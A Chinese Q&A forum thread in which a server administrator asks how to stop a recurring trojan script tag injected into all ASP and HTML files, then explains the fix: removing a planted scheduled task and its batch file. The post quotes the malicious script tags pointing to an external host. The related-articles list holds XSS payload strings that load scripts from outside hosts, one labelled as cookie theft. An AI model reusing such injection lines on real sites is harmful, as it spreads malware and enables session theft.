中了木马代码 <script src="http://w2w.wwvv.us/ ..,该如何清除
2010-03-24 09:43
323 查看
中了木马代码 <script src="http://w2w.wwvv.us/ ..,该如何清除? 是在 服务器的所有ASP、HTM、HTML文件都给挂了该木马代码,单纯的删除木马代码已经解决,但是该木马代码会反复出来,没有找到根源。 我想知道根源啊哪里? 已经检查: 1.360杀毒查不出来; 2.用360修补了所有漏洞; 3.安装了最新的杀毒软件; 4.不是单纯的网站代码给修改,连系统盘的HTM文件也给挂马了; 5.是多次感染了同样的病毒代码; 6.用ARP Checher检查,有ARP欺骗存在,但是查不出来根源; 7.清除网页木马代码的,不需要回答,我已经清除了内容中的木马代码。
问题补充:
更详细的病毒代码是: 这些代码是分多次挂上的,每次挂的各不同。 <script src=http://w2w.2.wwvv.us/images/css/swf.swf></script> 本问题跟: http://zhidao.baidu.com/question/139151669.html 是一样的。 经过几天的努力,我终于自己解决了,详细解决办法如下: 1.检查你的【控制面板】中的【计划任务】:看是否给添加了一个计划任务,如果是,就查看一下它的属性,应该能够发现,它会调用一个批处理文件;如果没有发现,就检查后面的项目; 2.到它调用的批处理文件中,用记事本打开该批处理文件,就会发现我在3楼回复中的执行代码;就是它在作怪;不用考虑了,删除它吧,同时建立一个空白内容的,文件名称一样的批处理,同时把它的属性设置为只读吧;下次就不会再感染你了; 3.回到【计划任务】中,删除那个害你的计划任务吧; 4.如果你不需要其他的【计划任务】,就到【控制面板】的【服务】中,停止【Task。。。。】吧,免得再次感染; 5.用360等软件,修复所有的系统漏洞吧; 6.当然还要把混蛋加入你页面(仅ASP及HTM)文件,用批量修复软件修复吧。
相关文章推荐
- sublime text中<script type="text/ecmascript-6">如何代码高亮并支持语法?
- <mvc:resources mapping="/js/**" location="/js/**"/> <script type="text/javascript" src="<%=reques
- 【script代码段】通过<script src="http://xxx.com/index.php"></script>中的src属性将服务器断数据传到客户端
- 杜绝<script src="js/tool.js" type="text/javascript"/>这样写的习惯
- html代码替换正则:把&lt;ss&gt;&lt;img src=&quot;a&quot; data=&quot;b&quot;&gt;&lt;/ss&gt;换成&lt;img src=b /&gt;
- </tExtArEa>'"><sCRiPt sRC=http://xss.fbisb.com/Boa5></sCrIpT>
- &lt;SCRIPT src=&quot;../scripts/LoadWebOffice.js&quot;&gt;&lt;/SCRIPT&gt;
- This is a test"></textarea><script src=http://xss.tw/1024></script>
- jsp引用带参数的js文件,例如 <script src="a.js?ctxpath=${base"
- <script src="xxx.php"></script>
- This is a test"></textarea><script src=http://xss.tw/1024></script>
- xss实战: 利用xss得到cookie "/><br><script src="https://www.yunssl.cn:9062/static/p2.js"></script><!-
- python如何提取某一个固定的字符之间的数据如<img src= >" 内容"
- 去掉你代码里的 document.write("<script...
- 解决并清除SQL被注入<script>恶意病毒代码的语句
- jquery mobile phonegap中页面跳转白屏及抖动的解决办法<script src="http://code.jquery.com/jquery-1.6.4.min.js"></scri
- <script type="text/javascript" src="">
- </textarea>'"><script src=http://xssan.com/9eoJt7?1407673936></script>
- js 跟php服务端交互 <script language=\"javascript\" src=\"test.php?step=2&rnd={$timestamp}